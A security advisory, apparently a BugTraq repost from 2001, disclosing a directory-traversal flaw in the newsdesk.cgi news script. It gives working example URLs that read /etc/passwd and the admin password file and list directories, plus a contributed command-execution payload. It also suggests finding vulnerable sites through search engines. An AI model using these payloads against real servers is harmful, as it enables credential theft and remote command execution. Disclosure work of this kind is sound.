[ SOURCE: http://www.secureroot.com/security/advisories/9786224444.html ] Introduction: News Desk 1.2 (newsdesk.cgi) is a news submission script which is written in perl and allows someone on a remote computer to connect to the server and post news submissions without logging into the actual server. By logging into the cgi with a custom login and password (pass.txt) the admin is able to post the latest headline news to his/her website with ease. The Vendors website is: http://www.ibrow.com Problem: Adding the string "/../" to an URL allows an attacker to view any file on the server, and also list directories within the server which the owner of the vulnerable httpd has permissions to access. Examples: http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi? t=../../../../etc/passwd ^^ = Will obviously open the passwd file, if unshadowed. http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi? t=../pass.txt ^^ = Will open the password string which can be used to login to the newsdesk.cgi and post new news, or with special variables the ability to upload/post html to the htdoc's directory, possibly leading to a defacement of the webpage. http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi? t=../../../../etc/ ^^ = Will obviously list the /etc/ directory. Not all servers will list directories, but most apear to. Note: It depends on where they install newsdesk.cgi, not always in a cgi-bin, so it could be installed with any path. Just goto your favorite search engine and search for newsdesk.cgi and voila. There is also some other variants of this cgi script out there, most of them are noticeable by the news.cgi? a=something&t=meow.html format. Notice the a= & t= which is a clear give-away to Newsdesk. Solution: Vendor has been contacted. And will release a updated version which is supposed to be more secure... Special Thanks to: zenomorph Which contributed this: Remote command execution is possible on most sites if you use the correct directory syntax such as ../../../bin/ls%20/| is a working example, many more commands are possible if you play around with it a bit, such as spawning xterms. -------------------- Found By: b10z cgi advisory. slipy@b10z.net Found on December 10th, 2000. Posted to BugTraq Jan 3rd, 2001.